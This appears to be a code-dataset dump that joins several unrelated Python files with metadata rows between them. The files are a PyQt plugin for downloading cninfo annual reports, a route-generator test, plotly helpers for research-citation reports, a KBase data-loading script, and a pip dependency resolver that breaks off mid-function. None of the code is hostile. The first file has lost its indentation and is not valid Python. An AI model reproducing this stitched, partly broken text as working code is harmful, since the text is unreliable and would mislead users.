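    quit_flag = [False]
    AnnouncementDownloader.download_annual_report('000001.SZSE',
                                                  (years_ago(3), now()),
                                                  quit_flag)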
# ----------------------------------------------------------------------------------------------------------------------
ALL_STOCK_TEXT = '所有'
DEFAULT_INFO = '''
What this extension does: download public reports of listed companies from cninfo (www.cninfo.com.cn)
1. The download code comes from: https://github.com/gaodechen/cninfo_process
2. If you choose "自定义" (custom), set your own keywords to filter reports by title
3. The default download path is Download/report/ under the current directory
4. Download tasks occupy the system work queue and share resources with the data update feature
  - Manage download tasks under "View -> 任务管理" (task management)
  - The next task can be queued before the previous one has finished
5. Selecting too wide a time range or too many stocks may get you BANNED by the site; do not be greedy
'''
DOWNLOAD_ALL_TIPS = '''
The next operation will download annual reports for ALL stocks.
This takes a very long time and a large amount of disk space,
********and it may get you BANNED by the website********
Unless you specifically need this, download individual stocks separately instead.
-------------Continue with this operation?-------------
'''
# ----------------------------------- UpdateTask -----------------------------------
class AnnouncementDownloadTask(TaskQueue.Task):
REPORT_TYPE_NONE = 0
REPORT_TYPE_ANNUAL = 1
def __init__(self):
super(AnnouncementDownloadTask, self).__init__('AnnouncementDownloadTask')
self.__quit_flag = [False]
# Modules
self.sas_if: sasIF = None
self.task_manager: TaskQueue = None
# self.data_utility = None
# Parameters
self.securities = ''
self.period_since = None
self.period_until = None
self.filter_include = []
self.filter_exclude = []
self.report_type = AnnouncementDownloadTask.REPORT_TYPE_ANNUAL
def run(self):
try:
self.__execute_update()
except Exception as e:
print(e)
print('Continue...')
finally:
print('Finished')
def quit(self):
self.__quit_flag[0] = True
def identity(self) -> str:
return 'Download Report: ' + self.securities
def __execute_update(self):
if self.securities == ALL_STOCK_TEXT:
stock_list = self.sas_if.sas_get_stock_info_list()
for stock_identity, stock_name in stock_list:
if self.__quit_flag is not None and self.__quit_flag[0]:
break
# self.__build_sub_update(stock_identity)
AnnouncementDownloader.download_annual_report(stock_identity, (self.period_since, self.period_until),
self.__quit_flag)
elif self.report_type == AnnouncementDownloadTask.REPORT_TYPE_ANNUAL:
AnnouncementDownloader.download_annual_report(self.securities, (self.period_since, self.period_until),
self.__quit_flag)
else:
pass
# def __build_sub_update(self, securities: str):
# task = AnnouncementDownloadTask()
# task.securities = securities
# task.period_since = self.period_since
# task.period_until = self.period_until
# task.filter_include = self.filter_include
# task.filter_exclude = self.filter_exclude
# task.report_type = self.report_type
# task.task_manager = self.task_manager
# self.task_manager.append_task(task)
# ----------------------------- AnnouncementDownloaderUi -----------------------------
class AnnouncementDownloaderUi(QWidget):
def __init__(self, sas_if: sasIF, task_manager):
super(AnnouncementDownloaderUi, self).__init__()
# ---------------- ext var ----------------
self.__sas_if = sas_if
# self.__data_center = self.__data_hub.get_data_center() if self.__data_hub is not None else None
# self.__data_utility = self.__data_hub.get_data_utility() if self.__data_hub is not None else None
self.__task_manager = task_manager
self.__translate = QtCore.QCoreApplication.translate
# Timer for update stock list
self.__timer = QTimer()
self.__timer.setInterval(1000)
self.__timer.timeout.connect(self.on_timer)
self.__timer.start()
# Ui component
self.__combo_name = SecuritiesSelector(self.__sas_if, self)
self.__radio_annual_report = QRadioButton('年报')
self.__radio_customize_filter = QRadioButton('自定义')
self.__line_filter_include = QLineEdit()
self.__line_filter_exclude = QLineEdit()
self.__button_download = QPushButton('确定')
self.__datetime_since = QDateTimeEdit(QDateTime.currentDateTime().addYears(-3))
self.__datetime_until = QDateTimeEdit(QDateTime.currentDateTime())
self.init_ui()
# ---------------------------------------------------- UI Init -----------------------------------------------------
def init_ui(self):
self.__layout_control()
self.__config_control()
def __layout_control(self):
main_layout = QVBoxLayout()
self.setLayout(main_layout)
main_layout.addLayout(horizon_layout([QLabel('股票代码'), self.__combo_name], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('报告起始'), self.__datetime_since], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('报告截止'), self.__datetime_until], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('报告类型'), self.__radio_annual_report,
self.__radio_customize_filter], [1, 5, 5]))
main_layout.addLayout(horizon_layout([QLabel('包含词条(以,分隔)'), self.__line_filter_include], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('排除词条(以,分隔)'), self.__line_filter_exclude], [1, 10]))
main_layout.addWidget(QLabel(DEFAULT_INFO))
main_layout.addWidget(self.__button_download)
def __config_control(self):
# self.__combo_name.setEditable(True)
# self.__combo_name.addItem('所有')
# self.__combo_name.addItem('股票列表载入中')
self.__radio_annual_report.setChecked(True)
self.__line_filter_include.setEnabled(False)
self.__line_filter_exclude.setEnabled(False)
self.__radio_customize_filter.setEnabled(False)
self.__radio_annual_report.clicked.connect(self.on_radio_report_type)
self.__radio_customize_filter.clicked.connect(self.on_radio_report_type)
self.__button_download.clicked.connect(self.on_button_download)
def on_timer(self):
if self.__combo_name.count() > 1:
self.__combo_name.insertItem(0, ALL_STOCK_TEXT)
self.__combo_name.setCurrentIndex(0)
self.__timer.stop()
# # Check stock list ready and update combobox
# if self.__data_utility is not None:
# if self.__data_utility.stock_cache_ready():
# self.__combo_name.clear()
# self.__combo_name.addItem(ALL_STOCK_TEXT)
# stock_list = self.__data_utility.get_stock_list()
# for stock_identity, stock_name in stock_list:
# self.__combo_name.addItem(stock_identity + ' | ' + stock_name, stock_identity)
def on_radio_report_type(self):
if self.__radio_annual_report.isChecked():
self.__line_filter_include.setEnabled(False)
self.__line_filter_exclude.setEnabled(False)
else:
self.__line_filter_include.setEnabled(True)
self.__line_filter_exclude.setEnabled(True)
def on_button_download(self):
# input_securities = self.__combo_name.currentText()
# if '|' in input_securities:
# input_securities = input_securities.split('|')[0].strip()
input_securities = self.__combo_name.get_input_securities()
if input_securities == ALL_STOCK_TEXT:
if self.__sas_if is None:
QMessageBox.information(self,
QtCore.QCoreApplication.translate('main', '提示'),
QtCore.QCoreApplication.translate('main', '无法获取股票列表'),
QMessageBox.Yes, QMessageBox.No)
return
reply = QMessageBox.question(self,
QtCore.QCoreApplication.translate('main', '操作确认'),
QtCore.QCoreApplication.translate('main', DOWNLOAD_ALL_TIPS),
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if reply != QMessageBox.Yes:
return
self.__build_download_task(input_securities)
def __build_download_task(self, securities: str):
task = AnnouncementDownloadTask()
task.securities = securities
task.period_since = self.__datetime_since.dateTime().toPyDateTime()
task.period_until = self.__datetime_until.dateTime().toPyDateTime()
task.filter_include = self.__line_filter_include.text().split(',')
task.filter_exclude = self.__line_filter_exclude.text().split(',')
task.report_type = \
AnnouncementDownloadTask.REPORT_TYPE_ANNUAL \
if self.__radio_annual_report.isChecked() else \
AnnouncementDownloadTask.REPORT_TYPE_NONE
task.task_manager = self.__task_manager
task.sas_if = self.__sas_if
# task.data_utility = self.__data_utility
if self.__task_manager is not None:
self.__task_manager.append_task(task)
else:
task.run()
# ----------------------------------------------------------------------------------------------------------------------
def plugin_prob() -> dict:
return {
'plugin_id': 'efa60977-65e9-4ecf-9271-7c6e629da399',
'plugin_name': 'ReportDownloader',
'plugin_version': '0.0.0.1',
'tags': ['Announcement', 'Report', 'Finance Report', 'Annual Report', 'Sleepy'],
}
def plugin_adapt(method: str) -> bool:
return method in ['widget']
def plugin_capacities() -> list:
return ['widget']
# ----------------------------------------------------------------------------------------------------------------------
sasInterface = None
def init(sas_if) -> bool:
try:
global sasInterface
sasInterface = sas_if
except Exception as e:
pass
finally:
pass
return True
def widget(parent: QWidget, **kwargs) -> (QWidget, dict):
ui_context: UiContext = kwargs.get('ui_context', None)
task_manager = None if ui_context is None else ui_context.get_task_queue()
return AnnouncementDownloaderUi(sasInterface, task_manager), \
{'name': '年报下载', 'show': False}
# ----------------------------------------------------------------------------------------------------------------------
def main():
app = QApplication(sys.argv)
dlg = WrapperQDialog(AnnouncementDownloaderUi(None, None))
dlg.exec()
# ----------------------------------------------------------------------------------------------------------------------
def exception_hook(type, value, tback):
# log the exception here
print('Exception hook triggered.')
print(type)
print(value)
print(tback)
# then call the default handler
sys.__excepthook__(type, value, tback)
if __name__ == "__main__":
sys.excepthook = exception_hook
try:
main()
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
exit()
finally:
pass
| 39.099638
| 195
| 0.580874
| 16,332
| 0.733792
| 0
| 0
| 7,540
| 0.33877
| 0
| 0
| 6,969
| 0.313115
|
a23e80a2bc9c75ffcdcaee541fdcd296843ceb25
| 1,109
|
py
|
Python
|
tests/routes/generators/test_random.py
|
pedrofreitascampospro/locintel
|
eb9c56cdc308660c31d90abe9fe62bd3634ba273
|
[
"MIT"
] | null | null | null |
tests/routes/generators/test_random.py
|
pedrofreitascampospro/locintel
|
eb9c56cdc308660c31d90abe9fe62bd3634ba273
|
[
"MIT"
] | null | null | null |
tests/routes/generators/test_random.py
|
pedrofreitascampospro/locintel
|
eb9c56cdc308660c31d90abe9fe62bd3634ba273
|
[
"MIT"
] | null | null | null |
import random
import shapely.geometry as sg
from locintel.quality.generators.random import RandomRoutePlanGenerator, polygons
random.seed(10)
class TestRandomRoutePlanGenerator(object):
def test_random_route_plan_generator(self):
polygon = polygons["berlin"]
generator = RandomRoutePlanGenerator()
route_plan = generator.generate_route(polygon)
assert polygon.contains(sg.Point(route_plan.start.lng, route_plan.start.lat))
assert polygon.contains(sg.Point(route_plan.end.lng, route_plan.end.lat))
assert generator.name == "random"
def test_random_route_plan_generator_accepts_identifier(self):
polygon = polygons["berlin"]
generator = RandomRoutePlanGenerator()
identifier = "id1"
route_plan = generator.generate_route(polygon, identifier=identifier)
assert polygon.contains(sg.Point(route_plan.start.lng, route_plan.start.lat))
assert polygon.contains(sg.Point(route_plan.end.lng, route_plan.end.lat))
assert route_plan.identifier == identifier
assert generator.name == "random"
| 35.774194
| 85
| 0.733093
| 962
| 0.867448
| 0
| 0
| 0
| 0
| 0
| 0
| 37
| 0.033363
|
a23ebe170e2650bcc75fd785f5c11d3fba8249e1
| 3,878
|
py
|
Python
|
curtin-rci/local_utils.py
|
Curtin-Open-Knowledge-Initiative/mag_coverage_report
|
a75dd1273c44895b5c857ebd498407aa95bd45e5
|
[
"Apache-2.0"
] | null | null | null |
curtin-rci/local_utils.py
|
Curtin-Open-Knowledge-Initiative/mag_coverage_report
|
a75dd1273c44895b5c857ebd498407aa95bd45e5
|
[
"Apache-2.0"
] | 2
|
2021-08-30T11:52:25.000Z
|
2021-09-02T12:11:05.000Z
|
curtin-rci/local_utils.py
|
Curtin-Open-Knowledge-Initiative/mag_coverage_report
|
a75dd1273c44895b5c857ebd498407aa95bd45e5
|
[
"Apache-2.0"
] | 3
|
2021-07-04T07:39:01.000Z
|
2021-08-24T15:24:29.000Z
|
import pandas as pd
import plotly.graph_objects as go
from typing import Union, Optional
from pathlib import Path
def collate_time(df: pd.DataFrame,
columns: Union[str, list[str]],
year_range: Union[list, tuple]):
if type(columns) == str:
columns = [columns]
if type(year_range) == tuple:
year_range = range(*year_range)
filtered = df[df.published_year.isin(year_range)]
return_df = filtered[['school', 'total_outputs'] + columns].groupby('school').sum()
return_df.reset_index(inplace=True)
return_df['published_year'] = f'{year_range[0]}-{year_range[-1]}'
return return_df
def rci_scatter(df: pd.DataFrame,
x: Union[str, list[str]],
y: Union[str, list[str]],
color: Optional[str] = None,
title: Optional[str] = None,
fig: Optional[go.Figure] = None,
show: Optional[bool] = True,
**kwargs) -> go.Figure:
if not fig:
fig = go.Figure()
if type(x) == str:
x = [x]
if type(y) == str:
y = [y]
if len(x) == len(y):
xys = zip(x, y)
elif len(x) == 1 and len(y) > 1:
xys = [(x, ys) for ys in y]
else:
raise ValueError('X and Y lists need to be equal lengths or x to be a single variable')
for xs, ys in xys:
df['ys'] = [ys] * len(df)
fig.add_trace(go.Scatter(
x=df[xs],
y=df[ys],
mode='markers',
marker_color=df[color] if color else None,
customdata=df[['school', 'published_year', 'ys']],
hovertemplate=
"""School: %{customdata[0]}
Year: %{customdata[1]}
RCI Group: %{customdata[2]}
x: %{x}
y: %{y}"""
))
if title:
fig.update_layout(title=title)
fig.update_layout(xaxis_title='ERA18 RCI Groups')
fig.update_layout(yaxis_title='MAG-based RCI Groups')
if show:
fig.show()
return fig
DATA_FOLDER = Path('data_files')
MAIN_SCHOOLS = [
'Curtin Law School',
'Curtin Medical School',
'School of Accounting, Economics and Finance',
'School of Allied Health',
'School of Civil and Mechanical Engineering',
'School of Design and the Built Environment',
'School of Earth and Planetary Sciences',
'School of Education',
'School of Elec Eng, Comp and Math Sci',
'School of Management & Marketing',
'School of Media, Creative Arts and Social Inquiry',
'School of Molecular and Life Sciences',
'School of Nursing',
'School of Population Health',
'WASM Minerals, Energy and Chemical Engineering',
'Not Assigned'
]
CITATION_SCHOOLS = [
'Curtin Medical School',
'School of Allied Health',
'School of Civil and Mechanical Engineering',
'School of Earth and Planetary Sciences',
'School of Elec Eng, Comp and Math Sci',
'School of Molecular and Life Sciences',
'School of Nursing',
'School of Population Health',
'WASM Minerals, Energy and Chemical Engineering',
]
FIELD_METRIC_COLUMNS = [ #'magy_rci_group_0', 'magy_rci_group_I',
# 'magy_rci_group_II', 'magy_rci_group_III', 'magy_rci_group_IV',
# 'magy_rci_group_V', 'magy_rci_group_VI',
'magy_centile_1',
'magy_centile_5', 'magy_centile_10', 'magy_centile_25',
'magy_centile_50', 'magy_centile_other']
JOURNAL_METRIC_COLUMNS = ['rci_group_0', 'rci_group_I',
'rci_group_II', 'rci_group_III', 'rci_group_IV',
'rci_group_V', 'rci_group_VI', 'mag_centile_1',
'mag_centile_5', 'mag_centile_10', 'mag_centile_25',
'mag_centile_50', 'mag_centile_other']
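# Illustrative sketch (not part of the original file): aggregating field-level metrics over a
# year range and plotting two of them against each other. The DataFrame is assumed to carry the
# columns referenced throughout this module ('school', 'published_year', 'total_outputs', ...).
def _example_usage(df: pd.DataFrame) -> go.Figure:
    collated = collate_time(df, FIELD_METRIC_COLUMNS, (2016, 2019))
    return rci_scatter(collated, x='magy_centile_1', y='magy_centile_5',
                       title='Example scatter (placeholder columns)', show=False)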
| 33.721739
| 95
| 0.57968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,720
| 0.443528
|
a23fbcb063477231d30f7934e898ac5453872dde
| 2,492
|
py
|
Python
|
scripts/pa-loaddata.py
|
kbase/probabilistic_annotation
|
2454925ca98c80c73bda327a0eff8aed94c5a48d
|
[
"MIT"
] | null | null | null |
scripts/pa-loaddata.py
|
kbase/probabilistic_annotation
|
2454925ca98c80c73bda327a0eff8aed94c5a48d
|
[
"MIT"
] | null | null | null |
scripts/pa-loaddata.py
|
kbase/probabilistic_annotation
|
2454925ca98c80c73bda327a0eff8aed94c5a48d
|
[
"MIT"
] | null | null | null |
#! /usr/bin/python
import argparse
import os
from biokbase.probabilistic_annotation.DataParser import DataParser
from biokbase.probabilistic_annotation.Helpers import get_config
from biokbase import log
desc1 = '''
NAME
pa-loaddata -- load static database of gene annotations
SYNOPSIS
'''
desc2 = '''
DESCRIPTION
Load the static database of high-quality gene annotations along with
files containing intermediate data. The files are then available for
a probabilistic annotation server on this system. Since downloading
from Shock can take a long time, run this command to load the static
database files before the server is started. The configFilePath argument
specifies the path to the configuration file for the service.
Note that a probabilistic annotation server is unable to service client
requests for the annotate() and calculate() methods while this command is
running and must be restarted to use the new files.
'''
desc3 = '''
EXAMPLES
Load static database files:
> pa-loaddata loaddata.cfg
SEE ALSO
pa-gendata
pa-savedata
AUTHORS
Matt Benedict, Mike Mundy
'''
# Main script function
if __name__ == "__main__":
# Parse arguments.
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, prog='pa-loaddata', epilog=desc3)
parser.add_argument('configFilePath', help='path to configuration file', action='store', default=None)
usage = parser.format_usage()
parser.description = desc1 + ' ' + usage + desc2
parser.usage = argparse.SUPPRESS
args = parser.parse_args()
# Create a log object.
submod = os.environ.get('KB_SERVICE_NAME', 'probabilistic_annotation')
mylog = log.log(submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, config=args.configFilePath)
# Get the probabilistic_annotation section from the configuration file.
config = get_config(args.configFilePath)
# Create a DataParser object for working with the static database files (the
# data folder is created if it does not exist).
dataParser = DataParser(config)
# Get the static database files. If the files do not exist and they are downloaded
# from Shock, the command may run for a long time.
testDataPath = os.path.join(os.environ['KB_TOP'], 'services', submod, 'testdata')
dataOption = dataParser.getDatabaseFiles(mylog, testDataPath)
exit(0)
| 34.611111
| 124
| 0.726726
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,511
| 0.60634
|
a2408683ebb50640f78f65bb066c73360bbad5e1
| 21,441
|
py
|
Python
|
pippin.py
|
harlowja/pippin
|
e101ad867ea9982457374281a2050c30020b10f4
|
[
"Apache-2.0"
] | null | null | null |
pippin.py
|
harlowja/pippin
|
e101ad867ea9982457374281a2050c30020b10f4
|
[
"Apache-2.0"
] | null | null | null |
pippin.py
|
harlowja/pippin
|
e101ad867ea9982457374281a2050c30020b10f4
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (C) 2015 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
try:
from collections import OrderedDict # noqa
except ImportError:
from ordereddict import OrderedDict # noqa
import collections
import contextlib
import hashlib
import json
import logging
import os
import shutil
import sys
import tempfile
# TODO: get rid of this...
from taskflow.types import tree
from distutils import version as dist_version
import argparse
import networkx as nx
from pip import req as pip_req
from pkgtools.pypi import PyPIJson
from pkgtools.pypi import real_name as pypi_real_name
import requests
import six
LOG = logging.getLogger('pippin')
# Default URL downloading/fetching timeout...
TIMEOUT = 5.0
try:
from pip import util as pip_util # noqa
except ImportError:
from pip import utils as pip_util # noqa
class RequirementException(Exception):
pass
class NotFoundException(Exception):
pass
def parse_line(line, path=None):
from_where = ''
if path:
from_where = " -> ".join(str(r.req) for r in path)
from_where = from_where.strip()
if not from_where:
from_where = "???"
if line.startswith('-e') or line.startswith('--editable'):
if line.startswith('-e'):
line = line[2:].strip()
else:
line = line[len('--editable'):].strip().lstrip('=')
req = pip_req.InstallRequirement.from_editable(line,
comes_from=from_where)
else:
req = pip_req.InstallRequirement.from_line(line,
comes_from=from_where)
return req
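# Illustrative sketch (not part of the original script): parse_line() accepts both plain
# requirement specifiers and editable ("-e") lines. The URL below is a placeholder.
def _example_parse():
    plain = parse_line('six>=1.9')
    editable = parse_line('-e git+https://example.org/some/repo.git#egg=somepkg')
    return plain, editable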
class DiGraph(nx.DiGraph):
"""A directed graph subclass with useful utility functions."""
def __init__(self, data=None, name=''):
super(DiGraph, self).__init__(name=name, data=data)
self.frozen = False
def add_edge_not_same(self, n1, n2):
if n1 == n2:
return
else:
self.add_edge(n1, n2)
def pformat(self):
"""Pretty formats your graph into a string.
This pretty formatted string representation includes many useful
        details about your graph, including: name, type, frozenness, node count,
nodes, edge count, edges, graph density and graph cycles (if any).
"""
lines = []
lines.append("Name: %s" % self.name)
lines.append("Type: %s" % type(self).__name__)
lines.append("Frozen: %s" % nx.is_frozen(self))
lines.append("Nodes: %s" % self.number_of_nodes())
for n in self.nodes_iter():
lines.append(" - %s" % n)
lines.append("Edges: %s" % self.number_of_edges())
for (u, v, e_data) in self.edges_iter(data=True):
if e_data:
lines.append(" %s -> %s (%s)" % (u, v, e_data))
else:
lines.append(" %s -> %s" % (u, v))
lines.append("Density: %0.3f" % nx.density(self))
cycles = list(nx.cycles.recursive_simple_cycles(self))
lines.append("Cycles: %s" % len(cycles))
for cycle in cycles:
buf = six.StringIO()
buf.write("%s" % (cycle[0]))
for i in range(1, len(cycle)):
buf.write(" --> %s" % (cycle[i]))
buf.write(" --> %s" % (cycle[0]))
lines.append(" %s" % buf.getvalue())
return os.linesep.join(lines)
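# Illustrative sketch (not part of the original script): building a small dependency graph
# with the subclass above and pretty-printing it. The package names are placeholders.
def _example_graph():
    g = DiGraph(name='example')
    g.add_edge_not_same('six', 'pbr')
    g.add_edge_not_same('six', 'six')  # ignored: self-edges are skipped
    return g.pformat()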
_MatchedRelease = collections.namedtuple('_MatchedRelease',
['string_version',
'parsed_version',
'origin_url',
'origin_filename',
'origin_size'])
def req_key(req):
return req.req.key
@contextlib.contextmanager
def tempdir(**kwargs):
# This seems like it was only added in python 3.2
    # Make it here since it's useful...
# See: http://bugs.python.org/file12970/tempdir.patch
tdir = tempfile.mkdtemp(**kwargs)
try:
yield tdir
finally:
shutil.rmtree(tdir)
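# Illustration (not part of the original module): a minimal sketch of using the
# tempdir() context manager above; the directory (and anything written into it)
# is removed when the block exits.
def _example_tempdir():  # hypothetical helper, added for illustration only
    with tempdir(prefix="pippin-") as a_dir:
        scratch_file = os.path.join(a_dir, "scratch.txt")
        with open(scratch_file, "w") as fh:
            fh.write("temporary data")
    # a_dir and scratch_file no longer exist at this point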
def check_is_compatible_alongside(pkg_req, gathered):
# If we conflict with the currently gathered requirements, give up...
for req_name, other_req in six.iteritems(gathered):
if req_key(pkg_req) == req_name:
if pkg_req.details['version'] not in other_req.req:
raise RequirementException("'%s==%s' not in '%s'"
% (pkg_req.details['name'],
pkg_req.details['version'],
other_req))
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
"-r", "--requirement",
dest="requirements",
nargs="+",
default=[],
metavar="<file>",
help="Analyze all the packages listed in the given requirements file")
parser.add_argument(
"-s", "--scratch",
dest="scratch",
default=os.getcwd(),
metavar="<path>",
help="Scratch path (used for caching downloaded data)"
" [default: %s]" % (os.getcwd()))
parser.add_argument(
"-v", "--verbose",
dest="verbose",
action='store_true',
default=False,
help="Enable verbose output")
parser.add_argument(
"-t", "--timeout",
dest="timeout",
type=float,
default=float(TIMEOUT),
help="Connection timeout (default: %s)" % TIMEOUT)
return parser
def download_url_to(url, options, save_path):
LOG.debug("Downloading '%s' -> '%s' (timeout=%s)",
url, save_path, options.timeout)
resp = requests.get(url, timeout=options.timeout)
with open(save_path, 'wb') as fh:
fh.write(resp.content)
return resp.content
def parse_requirements(options):
requirements = OrderedDict()
for filename in options.requirements:
try:
entries = list(pip_req.parse_requirements(filename))
for req in reversed(entries):
if req_key(req) in requirements:
raise ValueError("Currently only one requirement for '%s'"
" is allowed, merging is not currently"
" supported" % req_key(req))
requirements[req_key(req)] = req
except Exception as ex:
raise IOError("Cannot parse '%s': %s" % (filename, ex))
return requirements
class EggDetailer(object):
def __init__(self, options):
self.options = options
self.egg_cache = {}
self.egg_fail_cache = {}
def _get_directory_details(self, path):
if not os.path.isdir(path):
raise IOError("Can not detail non-existent directory %s" % (path))
req = parse_line(path)
req.source_dir = path
req.run_egg_info()
dependencies = []
for d in req.requirements():
            if not d.startswith("-e") and "#" in d:
d = d.split("#")[0]
d = d.strip()
if d:
dependencies.append(d)
details = {
'req': req.req,
'dependencies': dependencies,
'name': req.name,
'pkg_info': req.pkg_info(),
'dependency_links': req.dependency_links,
'version': req.installed_version,
}
return details
def _get_archive_details(self, filename, filesize):
if not os.path.isfile(filename):
raise IOError("Can not detail non-existent file %s" % (filename))
cache_key = "f:%s:%s" % (os.path.basename(filename), filesize)
if cache_key in self.egg_fail_cache:
exc_type, exc_value, exc_traceback = self.egg_fail_cache[cache_key]
six.reraise(exc_type, exc_value, exc_traceback)
try:
return self.egg_cache[cache_key]
except KeyError:
with tempdir() as a_dir:
arch_filename = os.path.join(a_dir, os.path.basename(filename))
shutil.copyfile(filename, arch_filename)
extract_to = os.path.join(a_dir, 'build')
os.makedirs(extract_to)
pip_util.unpack_file(arch_filename, extract_to,
content_type='', link='')
try:
details = self._get_directory_details(extract_to)
except Exception:
# Don't bother saving the traceback (we don't care
# about it...)
exc_type, exc_value, exc_traceback = sys.exc_info()
self.egg_fail_cache[cache_key] = (exc_type,
exc_value, None)
raise
else:
self.egg_cache[cache_key] = details
return details
def fetch(self, req):
origin_filename = req.origin_filename
origin_url = req.origin_url
download_path = os.path.join(self.options.scratch,
'.download', origin_filename)
if not os.path.exists(download_path):
download_url_to(origin_url, self.options, download_path)
return self._get_archive_details(download_path, req.origin_size)
class PackageFinder(object):
MAX_VERSIONS = 5
def __init__(self, options):
self.options = options
self.no_sdist_cache = set()
self.no_parse_cache = set()
def match_available(self, pkg_req, path=None):
looked_in = []
useables = []
available = self._find_releases(req_key(pkg_req))
req = pkg_req.req
for a in reversed(available):
v = a.string_version
if v in req:
line = "%s==%s" % (req_key(pkg_req), v)
m_req = parse_line(line, path=path)
m_req.origin_url = a.origin_url
m_req.origin_filename = a.origin_filename
m_req.origin_size = a.origin_size
useables.append(m_req)
if len(useables) == self.MAX_VERSIONS:
break
else:
looked_in.append(v)
if not useables:
raise NotFoundException("No requirement found that"
" matches '%s' (tried %s)" % (pkg_req,
looked_in))
else:
return useables
def _find_releases(self, pkg_name):
def req_func(url, timeout=None):
LOG.debug("Downloading '%s' (timeout=%s)", url, timeout)
r = requests.get(url, timeout=timeout)
return r.content
def sorter(r1, r2):
return cmp(r1[1], r2[1])
version_path = os.path.join(self.options.scratch,
".versions", "%s.json" % pkg_name)
if os.path.exists(version_path):
with open(version_path, 'rb') as fh:
pkg_data = json.loads(fh.read())
else:
real_pkg_name = pypi_real_name(pkg_name,
timeout=self.options.timeout)
if not real_pkg_name:
raise ValueError("No pypi package named '%s' found" % pkg_name)
pypi = PyPIJson(real_pkg_name, fast=True)
pypi_data = pypi.retrieve(timeout=self.options.timeout,
req_func=req_func)
pkg_data = {}
releases = pypi_data.get('releases', {})
for version, release_urls in six.iteritems(releases):
if not release_urls:
continue
pkg_data[version] = release_urls
if not pkg_data:
raise ValueError("No pypi package release information for"
" '%s' found" % pkg_name)
with open(version_path, 'wb') as fh:
fh.write(json.dumps(pkg_data, indent=4))
releases = []
for version, release_urls in six.iteritems(pkg_data):
rel = rel_fn = rel_size = None
for r in release_urls:
if r['packagetype'] == 'sdist':
rel = r['url']
rel_fn = r['filename']
rel_size = r['size']
rel_identity = "%s==%s" % (pkg_name, version)
if not all([rel, rel_fn, rel_size]):
if rel_identity not in self.no_sdist_cache:
LOG.warn("No sdist found for '%s==%s'", pkg_name, version)
self.no_sdist_cache.add(rel_identity)
else:
try:
m_rel = _MatchedRelease(
version, dist_version.LooseVersion(version),
rel, rel_fn, rel_size)
releases.append(m_rel)
except ValueError:
if rel_identity not in self.no_parse_cache:
LOG.warn("Failed parsing '%s==%s'", pkg_name, version,
exc_info=True)
self.no_parse_cache.add(rel_identity)
return sorted(releases, cmp=sorter)
class DeepExpander(object):
def __init__(self, finder, detailer, options):
self.options = options
self.finder = finder
self.detailer = detailer
self.egg_fail_cache = set()
def expand_many(self, pkg_reqs):
graph = DiGraph()
pkg_direct_deps = []
for pkg_req in pkg_reqs:
path = [pkg_req]
pkg_direct_deps.append(self._expand(pkg_req, graph, path))
for pkg_req, direct_deps in zip(pkg_reqs, pkg_direct_deps):
graph.add_node(pkg_req.req, req=pkg_req)
for m in direct_deps:
graph.add_edge_not_same(pkg_req.req, m.req)
return graph
def _expand(self, pkg_req, graph, path):
if graph.has_node(pkg_req.req):
return [pkg_req]
else:
LOG.debug("Expanding matches for %s", pkg_req)
graph.add_node(pkg_req.req, req=pkg_req)
useables = []
for m in self.finder.match_available(pkg_req, path=path):
if not hasattr(m, 'details'):
try:
m.details = self.detailer.fetch(m)
except Exception as e:
if m.req not in self.egg_fail_cache:
LOG.warn("Failed detailing '%s'", m)
e_blob = str(e)
for line in e_blob.splitlines():
LOG.warn(line)
self.egg_fail_cache.add(m.req)
if not hasattr(m, 'details'):
continue
useables.append(m)
if m.req == pkg_req.req:
continue
else:
new_path = path[:]
new_path.append(m)
graph.add_node(m.req, req=m, exact=True)
graph.add_edge_not_same(pkg_req.req, m.req)
for dep in m.details['dependencies']:
dep_req = parse_line(dep, path=new_path)
new_path.append(dep_req)
dep_sols = []
for dep_sol in self._expand(dep_req, graph, new_path):
dep_sols.append(dep_sol)
graph.add_edge_not_same(m.req, dep_sol.req)
if not dep_sols:
raise ValueError("No solutions found for required"
" dependency '%s' for '%s'"
" (originating from requirement '%s')"
% (dep_req, m, pkg_req))
else:
new_path.pop()
if not useables:
raise ValueError("No working solutions found for required"
" requirement '%s'" % (pkg_req))
return useables
def expand(requirements, options):
if not requirements:
return {}
print("Expanding all requirements dependencies (deeply) and"
" finding matching versions that will be installable into a"
" directed graph...")
print("Please wait...")
# Cache it in the scratch dir to avoid recomputing...
buf = six.StringIO()
for (pkg_name, pkg_req) in six.iteritems(requirements):
buf.write(pkg_req.req)
buf.write("\n")
graph_name = hashlib.md5(buf.getvalue().strip()).hexdigest()
graph_name += str(PackageFinder.MAX_VERSIONS)
graph_pickled_filename = os.path.join(
options.scratch, '.graphs', "%s.gpickle" % graph_name)
if os.path.exists(graph_pickled_filename):
print("Loading prior graph from '%s" % graph_pickled_filename)
return nx.read_gpickle(graph_pickled_filename)
else:
finder = PackageFinder(options)
detailer = EggDetailer(options)
graph = DiGraph(name=graph_name)
expander = DeepExpander(finder, detailer, options)
graph = expander.expand_many(list(six.itervalues(requirements)))
nx.write_gpickle(graph, graph_pickled_filename)
return graph
def tree_generator(root, graph, parent=None):
children = list(graph.successors_iter(root))
if parent is None:
parent = tree.Node(root, **graph.node[root])
for child in children:
node = tree.Node(child, **graph.node[child])
parent.add(node)
tree_generator(child, graph, parent=node)
return parent
def resolve(requirements, graph, options):
def _is_exact(req):
if len(req.specs) == 0:
return False
equals = 0
for (op, _ver) in req.specs:
if op == "==":
equals += 1
